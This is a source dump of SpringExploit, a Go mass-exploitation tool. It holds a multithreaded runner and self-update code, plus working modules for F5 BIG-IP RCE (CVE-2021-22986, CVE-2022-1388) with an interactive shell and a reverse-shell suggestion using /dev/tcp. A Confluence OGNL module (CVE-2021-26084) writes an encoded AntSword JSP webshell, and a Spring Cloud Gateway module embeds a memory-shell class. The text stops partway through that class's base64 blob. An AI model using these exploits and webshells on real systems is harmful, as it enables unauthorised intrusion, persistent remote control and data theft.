| "github.com/panjf2000/ants/v2" 9 | log "github.com/sirupsen/logrus" 10 | "net/url" 11 | "sync" 12 | ) 13 | 14 | type Runner struct { 15 | options *Options 16 | } 17 | 18 | func NewRunner(options *Options) (*Runner, error) { 19 | r := Runner{options: options} 20 | 21 | mops := structs.Map(&r.options) 22 | data, _ := json.Marshal(mops) 23 | log.Debug("Runner created") 24 | log.Debug(mops) 25 | log.Debug("Runner options: ", string(data)) 26 | return &r, nil 27 | 28 | } 29 | 30 | func (r *Runner) Run() { 31 | log.Info("Starting SpringExploit") 32 | log.Debug("Runner Running") 33 | //ip := r.options.IP 34 | var urls []string 35 | // TODO: check if options are valid 36 | //r.options.Url = "http://127.0.0.1:8090/" 37 | 38 | if r.options.Url != "" { 39 | urls = append(urls, r.options.Url) 40 | } else if r.options.File != "" { 41 | urls, _ = utils.ReadFile(r.options.File) 42 | } else if r.options.IP != "" { 43 | urls = utils.GetIPToUrlsLinks(r.options.IP, urls) 44 | } else if r.options.Update { 45 | // go update 46 | //selfUpdate() 47 | // go github update 48 | doSelfUpdate() 49 | return 50 | } else if r.options.Version { 51 | // go update 52 | //getLatestVersion() 53 | // go github update 54 | confirmAndSelfUpdate() 55 | return 56 | } else if r.options.SP { 57 | return 58 | } else { 59 | log.Error("No file or url or ips specified") 60 | return 61 | } 62 | 63 | log.Debugln("URLs Numbers: ", len(urls)) 64 | var i = 0 65 | k := r.options.Thread 66 | var wg sync.WaitGroup 67 | hashmap := structs.Map(&r.options) 68 | defer ants.Release() 69 | // TODO: check if options are valid 70 | if k <= 0 { 71 | k = 500 72 | } 73 | log.Info("Running with ", k, " threads") 74 | pool, err1 := ants.NewPool(k+1, ants.WithPreAlloc(true)) 75 | if err1 != nil { 76 | log.Error("Error creating pool") 77 | return 78 | } 79 | log.Info("Total URLs: ", len(urls)) 80 | 81 | for i < len(urls) { 82 | //TODO 老代码 83 | //for t := 0; t < k; t++ { 84 | // if i == len(urls) { 85 | // break 86 | // } 87 | // if urls[i] != "" { 88 | // log.Debugln("Running attack on: ", urls[i]) 89 | // // 通道通信 发送url 并且 i++ 90 | // c := make(chan int) 91 | // wg.Add(1) 92 | // go func() { 93 | // log.Debugf("Running go func() %d", t) 94 | // Start(urls[i], hashmap, i, c) // Start k goroutines 95 | // wg.Done() 96 | // }() 97 | // i = <-c 98 | // } else { 99 | // wg.Wait() 100 | // i++ 101 | // break 102 | // } 103 | //} 104 | 105 | for t := 0; t < k; t++ { 106 | j := i 107 | task := func() { 108 | log.Debugf("Running Submit threads %d url is %s %d", t, urls[j], j) 109 | Start2(urls[j], hashmap) // Start k goroutines 110 | wg.Done() 111 | } 112 | if i == len(urls) { 113 | break 114 | } 115 | if urls[i] != "" { 116 | // 通道通信 发送url 并且 i++ 117 | //c := make(chan int) 118 | log.Debugf("Now Threads: %d", t) 119 | wg.Add(1) 120 | err := pool.Submit(task) 121 | i++ 122 | if err != nil { 123 | log.Error("Error submitting job " + urls[i]) 124 | log.Error(err) 125 | } 126 | //i = <-c 127 | } else { 128 | i++ 129 | wg.Wait() 130 | } 131 | } 132 | 133 | } 134 | wg.Wait() 135 | 136 | } 137 | 138 | func Start(u string, hashmap map[string]interface{}, i int, c chan int) { 139 | log.Info("Runner started") 140 | log.Infoln("Pen-testing URL: ", u) 141 | //for k, v := range hashmap { 142 | // log.Debugln("key: ", k, " value: ", v) 143 | //} 144 | r, err := url.Parse(u) 145 | if err != nil { 146 | log.Info("URL parse error") 147 | log.Errorln(err) 148 | return 149 | } 150 | var target string 151 | if r.Path == "" { 152 | target = r.Scheme + "://" + r.Host + "/" 153 | } else { 154 | target = r.Scheme + "://" + r.Host + r.Path 155 | } 156 | attack.Sevice(target, hashmap) 157 | defer func() { 158 | if errs := recover(); errs != nil { 159 | log.Debug("Runner panic: ", errs) 160 | } 161 | }() 162 | // 放到最后,不然无法生效 163 | c <- i + 1 164 | 165 | } 166 | 167 | func Start2(u string, hashmap map[string]interface{}) { 168 | log.Infof("%s Runner started", u) 169 | //log.Infoln("testing URL: ", u) 170 | //for k, v := range hashmap { 171 | // log.Debugln("key: ", k, " value: ", v) 172 | //} 173 | //defer func() { 174 | // if errs := recover(); errs != nil { 175 | // log.Debug(errs) 176 | // } 177 | //}() 178 | 179 | r, err := url.Parse(u) 180 | if err != nil { 181 | log.Info("URL parse error") 182 | log.Errorln(err) 183 | return 184 | } 185 | var target string 186 | if r.Path == "" { 187 | target = r.Scheme + "://" + r.Host + "/" 188 | } else { 189 | target = r.Scheme + "://" + r.Host + r.Path 190 | } 191 | attack.Sevice(target, hashmap) 192 | log.Infof("%s Runner finished", u) 193 | 194 | } 195 | -------------------------------------------------------------------------------- /cmd/commons/core/update.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | // 4 | //import ( 5 | // log "github.com/sirupsen/logrus" 6 | // "github.com/tj/go-update" 7 | // "github.com/tj/go-update/progress" 8 | // githubUpdateStore "github.com/tj/go-update/stores/github" 9 | // "runtime" 10 | // "strings" 11 | //) 12 | // 13 | //const ( 14 | // Owner = "SummerSec" 15 | // Repo = "SpringExploit" 16 | //) 17 | // 18 | //func selfUpdate() { 19 | // var command string 20 | // 21 | // //// get current executable path 22 | // //executable, err := os.Executable() 23 | // //if err != nil { 24 | // // log.Fatal(err) 25 | // //} 26 | // 27 | // switch runtime.GOOS { 28 | // case "windows": 29 | // command = Repo + ".exe" 30 | // default: 31 | // command = Repo 32 | // } 33 | // log.Debugf("command: %s", command) 34 | // m := &update.Manager{ 35 | // Command: command, 36 | // Store: &githubUpdateStore.Store{ 37 | // Owner: Owner, 38 | // Repo: Repo, 39 | // Version: version, 40 | // }, 41 | // } 42 | // 43 | // releases, err := m.LatestReleases() 44 | // if err != nil { 45 | // log.Error("Failed to get releases", err) 46 | // return 47 | // } 48 | // if len(releases) == 0 { 49 | // log.Info("No updates available") 50 | // return 51 | // } 52 | // latest := releases[0] 53 | // var currentOS string 54 | // switch runtime.GOOS { 55 | // case "darwin": 56 | // currentOS = "macOS" 57 | // default: 58 | // currentOS = runtime.GOOS 59 | // } 60 | // final := latest.FindZip(currentOS, runtime.GOARCH) 61 | // if final == nil { 62 | // log.Error("No update available for", currentOS, "and", runtime.GOARCH) 63 | // } 64 | // tarball, err := final.DownloadProxy(progress.Reader) 65 | // if err != nil { 66 | // log.Error("could not install latest release ", err) 67 | // return 68 | // } 69 | // if err := m.Install(tarball); err != nil { 70 | // log.Error("could not install latest release", err) 71 | // return 72 | // } 73 | // 74 | // log.Infof("Successfully Updated to %s Version %s", Repo, latest.Version) 75 | // 76 | //} 77 | // 78 | //// 获取最新版本 79 | //func getLatestVersion() { 80 | // log.Info("Crrunent Version : ", version) 81 | // latestverion := getLatestVersionFromGithub() 82 | // log.Infof("Latest Version: %s", latestverion) 83 | // if strings.Compare(latestverion, version) > 0 { 84 | // log.Info("Use Command SpringExploit -update to update to latest version ") 85 | // } 86 | // 87 | //} 88 | // 89 | //// 从github获取最新版本 90 | //func getLatestVersionFromGithub() string { 91 | // m := &update.Manager{ 92 | // Store: &githubUpdateStore.Store{ 93 | // Owner: Owner, 94 | // Repo: Repo, 95 | // Version: version, 96 | // }, 97 | // } 98 | // releases, err := m.LatestReleases() 99 | // if err != nil { 100 | // log.Error("Failed to get releases ", err) 101 | // return "" 102 | // } 103 | // defer func() { 104 | // if errs := recover(); errs != nil { 105 | // log.Debug("No updates available ", errs) 106 | // } 107 | // }() 108 | // 109 | // if releases == nil { 110 | // log.Info("No updates available") 111 | // return version 112 | // } else { 113 | // return releases[0].Version 114 | // } 115 | //} 116 | -------------------------------------------------------------------------------- /cmd/commons/core/update2.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "github.com/blang/semver" 7 | "github.com/projectdiscovery/stringsutil" 8 | "github.com/rhysd/go-github-selfupdate/selfupdate" 9 | log "github.com/sirupsen/logrus" 10 | "os" 11 | ) 12 | 13 | const info = "SummerSec/SpringExploit" 14 | 15 | func doSelfUpdate() { 16 | latest, found, err := selfupdate.DetectLatest(info) 17 | if err != nil { 18 | log.Infoln("Error occurred while detecting version:", err) 19 | return 20 | } 21 | 22 | v := semver.MustParse(version) 23 | if !found || latest.Version.LTE(v) { 24 | log.Infof("Current binary is the latest version %s", version) 25 | return 26 | } 27 | 28 | latest1, err := selfupdate.UpdateSelf(v, info) 29 | 30 | if latest1.Version.LTE(v) { 31 | log.Infof("Current binary is the latest version %s", version) 32 | 33 | } else { 34 | log.Infoln("Successfully updated to version", latest.Version) 35 | log.Infoln("Release note:\n", latest.ReleaseNotes) 36 | } 37 | } 38 | 39 | func confirmAndSelfUpdate() { 40 | latest, found, err := selfupdate.DetectLatest(info) 41 | if err != nil { 42 | log.Infoln("Error occurred while detecting version:", err) 43 | return 44 | } 45 | 46 | v := semver.MustParse(version) 47 | if !found || latest.Version.LTE(v) { 48 | log.Infof("Current version is the latest version %s", version) 49 | return 50 | } 51 | 52 | fmt.Print("Do you want to update to latest version ", latest.Version, "? (y/n): ") 53 | input, err := bufio.NewReader(os.Stdin).ReadString('\n') 54 | // 如果input 存在\r或者\n,则去掉 55 | if stringsutil.HasSuffixAny(input, "\r\n", "\n", "\r") { 56 | input = stringsutil.TrimSuffixAny(input, "\r\n", "\n", "\r") 57 | } 58 | if err != nil || (input != "y" && input != "n" && input != "Y" && input != "N") { 59 | log.Println("Invalid input") 60 | return 61 | } 62 | if input == "n" { 63 | return 64 | } 65 | 66 | exe, err := os.Executable() 67 | if err != nil { 68 | log.Println("Could not locate executable path") 69 | return 70 | } 71 | if err := selfupdate.UpdateTo(latest.AssetURL, exe); err != nil { 72 | log.Println("Error occurred while updating binary:", err) 73 | return 74 | } 75 | log.Println("Successfully updated to version", latest.Version) 76 | } 77 | -------------------------------------------------------------------------------- /cmd/commons/core/update_test.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | //"github.com/rhysd/go-github-selfupdate/selfupdate" 5 | "testing" 6 | ) 7 | 8 | func Test_selfUpdate(t *testing.T) { 9 | tests := []struct { 10 | name string 11 | }{ 12 | // TODO: Add test cases. 13 | } 14 | for _, tt := range tests { 15 | t.Run(tt.name, func(t *testing.T) { 16 | //selfupdate.UpdateSelf() 17 | }) 18 | } 19 | } 20 | 21 | func Test_getLatestVersionFromGithub(t *testing.T) { 22 | tests := []struct { 23 | name string 24 | want string 25 | }{ 26 | // TODO: Add test cases. 27 | } 28 | for _, tt := range tests { 29 | t.Run(tt.name, func(t *testing.T) { 30 | //if got := getLatestVersionFromGithub(); got != tt.want { 31 | // t.Errorf("getLatestVersionFromGithub() = %v, want %v", got, tt.want) 32 | //} 33 | }) 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /cmd/commons/poc/2021/CVE-2021-22986.go: -------------------------------------------------------------------------------- 1 | package _021 2 | 3 | import ( 4 | "encoding/json" 5 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 7 | "github.com/c-bata/go-prompt" 8 | "github.com/imroc/req/v3" 9 | log "github.com/sirupsen/logrus" 10 | "net/url" 11 | "strings" 12 | ) 13 | 14 | // 参考 https://github.com/Al1ex/CVE-2021-22986/blob/main/CVE_2021_22986.pyl 15 | 16 | type CVE202122986 struct{} 17 | 18 | func (t CVE202122986) SendPoc(target string, hashmap map[string]interface{}) { 19 | log.Debug("[+] Start CVE-2021-22986") 20 | 21 | //reqinfo := req2.NewReqInfo() 22 | //reqmap := structs.Map(reqinfo) 23 | reqmap := req2.NewReqInfoToMap(hashmap) 24 | 25 | // 初始化请求 26 | // TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值 27 | reqmap["h1"] = true 28 | 29 | u, _ := url.Parse(target) 30 | path := "/mgmt/tm/util/bash" 31 | reqmap["url"] = u.Scheme + "://" + u.Host + path 32 | reqmap["method"] = "POST" 33 | 34 | headers := map[string]string{ 35 | //"Host": "localhost", 36 | "User-Agent": utils.GetUA(), 37 | //"Connection": "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host", 38 | //"Connection": "keep-alive", 39 | "Authorization": "Basic YWRtaW46QVNhc1M=", 40 | "X-F5-Auth-Token": "", 41 | "Content-Type": "application/json", 42 | } 43 | 44 | reqmap["headers"] = headers 45 | 46 | randstr := utils.GetCode(10) 47 | log.Debugf("[+] randstr: %s", randstr) 48 | base64str := utils.EncodeBase64String(randstr) 49 | log.Debugf("[+] base64str: %s", base64str) 50 | 51 | reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}" 52 | //reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}" 53 | log.Debug("[+] Send CVE-2021-22986 request") 54 | resp := utils.Send(reqmap) 55 | 56 | if t.CheckExp(resp, randstr, hashmap) { 57 | t.SaveResult(target, hashmap["Out"].(string)) 58 | } 59 | 60 | if hashmap["Shell"].(bool) { 61 | log.Info("[+] Start CVE-2021-22986 shell") 62 | th := prompt.Input("[+] Please input command: ", completer) 63 | if th == "" { 64 | th = "whoami |base64 " 65 | } else { 66 | th = th + " |base64 " 67 | } 68 | reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c '" + th + "'\"}" 69 | resp = utils.Send(reqmap) 70 | txt := resp.String() 71 | 72 | log.Debugf("[+] resp: %s", txt) 73 | var txtmap map[string]interface{} 74 | err := json.Unmarshal([]byte(txt), &txtmap) 75 | if err != nil { 76 | log.Errorf("[-] Unmarshal error: %s", err) 77 | return 78 | } 79 | log.Info("命令执行结果: " + utils.DecodeBase64String(txtmap["commandResult"].(string))) 80 | log.Info("[+] End CVE-2021-22986 shell") 81 | } 82 | 83 | } 84 | 85 | func (CVE202122986) SaveResult(target string, file string) { 86 | result := target + " 存在 CVE-2021-22986 漏洞 可以使用 SpringExplit -u " + target + " -p CVE202122986 --shell 进入交互shell执行命令" 87 | err := utils.SaveToFile(result, file) 88 | log.Info(result) 89 | if err != nil { 90 | return 91 | } 92 | 93 | } 94 | 95 | func (CVE202122986) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool { 96 | defer func() { 97 | if err := recover(); err != nil { 98 | log.Error("[-] CheckExp error: ", err) 99 | } 100 | }() 101 | res := resp.String() 102 | if res == "" { 103 | return false 104 | } 105 | log.Debugf(res) 106 | if strings.Contains(res, randstr) { 107 | // 将res 转化成map 108 | var maps map[string]interface{} 109 | err := json.Unmarshal([]byte(res), &maps) 110 | log.Info("CVE-2021-22986 命令执行返回 commandResult: ", maps["commandResult"]) 111 | if err != nil { 112 | log.Debugf("[-] json.Unmarshal error: %s", err) 113 | return false 114 | } 115 | return true 116 | } 117 | return false 118 | } 119 | 120 | func completer(d prompt.Document) []prompt.Suggest { 121 | s := []prompt.Suggest{ 122 | {Text: "id", Description: "you can type command {id}"}, 123 | {Text: "bash", Description: "you can type command bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/8080 <&1'"}, 124 | } 125 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 126 | } 127 | -------------------------------------------------------------------------------- /cmd/commons/poc/2021/CVE-2021-26084.go: -------------------------------------------------------------------------------- 1 | package _021 2 | 3 | import ( 4 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 6 | "github.com/fatih/structs" 7 | "github.com/imroc/req/v3" 8 | log "github.com/sirupsen/logrus" 9 | "net/url" 10 | ) 11 | 12 | type CVE202126084 struct{} 13 | 14 | func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) { 15 | reqinfo := req2.NewReqInfo() 16 | reqmap := structs.Map(reqinfo) 17 | u := target + "pages/doenterpagevariables.action" 18 | shell := "PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmEuaW8uKixqYXZhLnV0aWwuemlwLioiJT4NCjwlIQ0KICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgew0KICAgIFUoQ2xhc3NMb2FkZXIgYykgew0KICAgICAgc3VwZXIoYyk7DQogICAgfQ0KICAgIHB1YmxpYyBDbGFzcyBnKGJ5dGVbXSBiKSB7DQogICAgICByZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoYiwgMCwgYi5sZW5ndGgpOw0KICAgIH0NCiAgfQ0KICBwdWJsaWMgYnl0ZVtdIGRlY29tcHJlc3MoYnl0ZVtdIGRhdGEpIHsNCiAgICBieXRlW10gb3V0cHV0ID0gbmV3IGJ5dGVbMF07DQogICAgSW5mbGF0ZXIgZGMgPSBuZXcgSW5mbGF0ZXIoKTsNCiAgICBkYy5yZXNldCgpOw0KICAgIGRjLnNldElucHV0KGRhdGEpOw0KICAgIEJ5dGVBcnJheU91dHB1dFN0cmVhbSBvID0gbmV3IEJ5dGVBcnJheU91dHB1dFN0cmVhbShkYXRhLmxlbmd0aCk7DQogICAgdHJ5IHsNCiAgICAgIGJ5dGVbXSBidWYgPSBuZXcgYnl0ZVsxMDI0XTsNCiAgICAgIHdoaWxlICghZGMuZmluaXNoZWQoKSkgew0KICAgICAgICBpbnQgaSA9IGRjLmluZmxhdGUoYnVmKTsNCiAgICAgICAgby53cml0ZShidWYsIDAsIGkpOw0KICAgICAgfQ0KICAgICAgb3V0cHV0ID0gby50b0J5dGVBcnJheSgpOw0KICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7DQogICAgICAgIG91dHB1dCA9IGRhdGE7DQogICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgfSBmaW5hbGx5IHsNCiAgICAgIHRyeSB7DQogICAgICAgICAgby5jbG9zZSgpOw0KICAgICAgfSBjYXRjaCAoSU9FeGNlcHRpb24gZSkgew0KICAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgICB9DQogICAgfQ0KICAgIGRjLmVuZCgpOw0KICAgIHJldHVybiBvdXRwdXQ7DQogIH0NCiAgcHVibGljIGJ5dGVbXSBiYXNlNjREZWNvZGUoU3RyaW5nIHN0cikgdGhyb3dzIEV4Y2VwdGlvbiB7DQogICAgdHJ5IHsNCiAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOw0KICAgICAgcmV0dXJuIChieXRlW10pIGNsYXp6LmdldE1ldGhvZCgiZGVjb2RlQnVmZmVyIiwgU3RyaW5nLmNsYXNzKS5pbnZva2UoY2xhenoubmV3SW5zdGFuY2UoKSwgc3RyKTsNCiAgICB9IGNhdGNoIChFeGNlcHRpb24gZSkgew0KICAgICAgQ2xhc3MgY2xhenogPSBDbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7DQogICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsNCiAgICAgIHJldHVybiAoYnl0ZVtdKSBkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGUiLCBTdHJpbmcuY2xhc3MpLmludm9rZShkZWNvZGVyLCBzdHIpOw0KICAgIH0NCiAgfQ0KJT4NCjwlDQogIFN0cmluZyBjbHMgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiYW50Iik7DQogIGlmIChjbHMgIT0gbnVsbCkgew0KICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGRlY29tcHJlc3MoYmFzZTY0RGVjb2RlKGNscykpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7DQogIH0NCiU+" 19 | // testAnt.jsp 20 | data := "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var b64Shell=\\u0027" + url.QueryEscape(shell) + "\\u0027;var shell=new java.lang.String(java.util.Base64.getDecoder().decode(b64Shell));var f=new java.io.FileOutputStream(new java.io.File(\\u0027../confluence/testAnt.jsp\\u0027));f.write(shell.getBytes());f.close();\\u0022)}%2b\\u0027" 21 | reqmap["url"] = u 22 | reqmap["method"] = "POST" 23 | reqmap["body"] = data 24 | reqmap["headers"] = map[string]string{ 25 | "User-Agent": utils.GetUA(), 26 | "Content-Type": "application/x-www-form-urlencoded", 27 | } 28 | 29 | // 默认配置 30 | reqmap["timeout"] = hashmap["Timeout"].(int) 31 | reqmap["retry"] = hashmap["Retry"].(int) 32 | reqmap["proxy"] = hashmap["Proxy"].(string) 33 | reqmap["mode"] = hashmap["Mode"].(int) 34 | reqmap["h1"] = hashmap["H1"].(bool) 35 | reqmap["redirect"] = hashmap["Redirect"].(bool) 36 | 37 | file := hashmap["Out"].(string) 38 | utils.Send(reqmap) 39 | 40 | // 验证是否利用成功 41 | reqmap["url"] = target + "testAnt.jsp" 42 | reqmap["method"] = "GET" 43 | reqmap["body"] = "" 44 | 45 | resp := utils.Send(reqmap) 46 | 47 | if p.CheckExp(resp, target, hashmap) { 48 | context := target + " 存在CVE-2021-26084漏洞!" + target + "testAnt.jsp 蚁剑密码 ant " 49 | log.Info(context) 50 | p.SaveResult(context, file) 51 | } 52 | 53 | } 54 | 55 | func (CVE202126084) init() { 56 | log.Debugf("CVE-2021-26084 init") 57 | } 58 | 59 | func (CVE202126084) SaveResult(target string, file string) { 60 | err := utils.SaveToFile(target, file) 61 | if err != nil { 62 | log.Debugf("CVE-2021-26084 SaveResult error: %s", err) 63 | return 64 | } 65 | } 66 | 67 | func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool { 68 | if resp.IsSuccess() { 69 | log.Debugf(resp.Dump()) 70 | return true 71 | } 72 | return false 73 | 74 | } 75 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-1388.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | // 参考 https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml 4 | import ( 5 | "encoding/json" 6 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 7 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 8 | "github.com/c-bata/go-prompt" 9 | "github.com/imroc/req/v3" 10 | log "github.com/sirupsen/logrus" 11 | "net/url" 12 | "strings" 13 | ) 14 | 15 | type CVE20221388 struct{} 16 | 17 | func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) { 18 | log.Debug("[+] Start CVE-2022-1388") 19 | 20 | //reqinfo := req2.NewReqInfo() 21 | //reqmap := structs.Map(reqinfo) 22 | reqmap := req2.NewReqInfoToMap(hashmap) 23 | 24 | // 初始化请求 25 | // TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值 26 | reqmap["h1"] = true 27 | 28 | u, _ := url.Parse(target) 29 | path := "/mgmt/tm/util/bash" 30 | reqmap["url"] = u.Scheme + "://" + u.Host + path 31 | reqmap["method"] = "POST" 32 | 33 | headers := map[string]string{ 34 | "Host": "localhost", 35 | "User-Agent": utils.GetUA(), 36 | //"Connection": "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host", 37 | "Connection": "keep-alive, x-f5-auTh-tOKen", 38 | "Authorization": "Basic YWRtaW46", 39 | "X-F5-Auth-Token": utils.GetCode(5), 40 | "Content-Type": "application/json", 41 | } 42 | 43 | reqmap["headers"] = headers 44 | 45 | randstr := utils.GetCode(10) 46 | log.Debugf("[+] randstr: %s", randstr) 47 | base64str := utils.EncodeBase64String(randstr) 48 | log.Debugf("[+] base64str: %s", base64str) 49 | 50 | reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}" 51 | //reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}" 52 | log.Debug("[+] Send CVE-2022-1388 request") 53 | resp := utils.Send(reqmap) 54 | 55 | if t.CheckExp(resp, randstr, hashmap) { 56 | t.SaveResult(target, hashmap["Out"].(string)) 57 | } 58 | 59 | if hashmap["Shell"].(bool) { 60 | log.Info("[+] Start CVE-2022-1388 shell") 61 | th := prompt.Input("[+] Please input command: ", completer) 62 | if th == "" { 63 | th = "whoami |base64 " 64 | } else { 65 | th = th + " |base64 " 66 | } 67 | reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c '" + th + "'\"}" 68 | resp = utils.Send(reqmap) 69 | txt := resp.String() 70 | 71 | log.Debugf("[+] resp: %s", txt) 72 | var txtmap map[string]interface{} 73 | err := json.Unmarshal([]byte(txt), &txtmap) 74 | if err != nil { 75 | log.Errorf("[-] Unmarshal error: %s", err) 76 | return 77 | } 78 | log.Info("命令执行结果: " + utils.DecodeBase64String(txtmap["commandResult"].(string))) 79 | log.Info("[+] End CVE-2022-1388 shell") 80 | } 81 | 82 | } 83 | 84 | func (CVE20221388) SaveResult(target string, file string) { 85 | result := target + " 存在 CVE-2022-1388漏洞 可以使用 SpringExplit -u " + target + " -p CVE20221388 --shell 进入交互shell执行命令" 86 | err := utils.SaveToFile(result, file) 87 | log.Info(result) 88 | if err != nil { 89 | return 90 | } 91 | 92 | } 93 | 94 | func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool { 95 | res, _ := resp.ToString() 96 | if res == "" { 97 | return false 98 | } 99 | log.Debugf(res) 100 | if strings.Contains(res, randstr) { 101 | // 将res 转化成map 102 | var maps map[string]interface{} 103 | err := json.Unmarshal([]byte(res), &maps) 104 | log.Info("CVE-2022-1388 命令执行返回 commandResult: ", maps["commandResult"]) 105 | if err != nil { 106 | log.Debugf("[-] json.Unmarshal error: %s", err) 107 | return false 108 | } 109 | return true 110 | } 111 | return false 112 | } 113 | 114 | func completer(d prompt.Document) []prompt.Suggest { 115 | s := []prompt.Suggest{ 116 | {Text: "id", Description: "you can type command {id}"}, 117 | {Text: "bash", Description: "you can type command bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/8080 <&1'"}, 118 | } 119 | return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true) 120 | } 121 | -------------------------------------------------------------------------------- /cmd/commons/poc/2022/CVE-2022-22947.go: -------------------------------------------------------------------------------- 1 | package _022 2 | 3 | import ( 4 | "fmt" 5 | req2 "github.com/SummerSec/SpringExploit/cmd/commons/req" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 7 | "github.com/fatih/structs" 8 | "github.com/imroc/req/v3" 9 | log "github.com/sirupsen/logrus" 10 | "strings" 11 | ) 12 | 13 | // 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/ 14 | 15 | //NettyMemshell 16 | const mem = "yv66vgAAADQBFAoAPgB9CAB+BwB/CABTBwCACgAFAIEKAIIAgwcAhAoAggCFCgCGAIcKAIYAiAoACACJCgAFAIoIAIsKAIwAjQgASwoABQCOCgCPAIMKAI8AkAoABQCRCABOCACSBwCTCgAXAH0KAI8AlAgAlQcAlggAlwsAmACZCACaCACbCwCcAJ0HAJ4LACEAnwgAoAoAoQCiCgChAKMHAKQKAKUApgoApQCnCgCoAKkKACYAqggAqwoAJgCsCgAmAK0JAK4ArwoAFwCwCgAbALELALIAswcAtAkAtQC2CQC3ALgKALkAugoAMgC7CwC8AJ8JAL0AvggAvwoAoQDACwCyAMEJAMIAwwsAxADFBwDGBwDHAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA9MTmV0dHlNZW1zaGVsbDsBAAhkb0luamVjdAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVX3ZhbCRkaXNwb3NhYmxlU2VydmVyAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAFHZhbCRkaXNwb3NhYmxlU2VydmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHX2NvbmZpZwEABmNvbmZpZwEAEF9kb09uQ2hhbm5lbEluaXQBAAZ0aHJlYWQBAAFpAQABSQEACmdldFRocmVhZHMBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAB3RocmVhZHMBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADbXNnAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAyAcAyQcAhAcAlgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAEE1ldGhvZFBhcmFtZXRlcnMBAAtjaGFubmVsUmVhZAEAPShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvb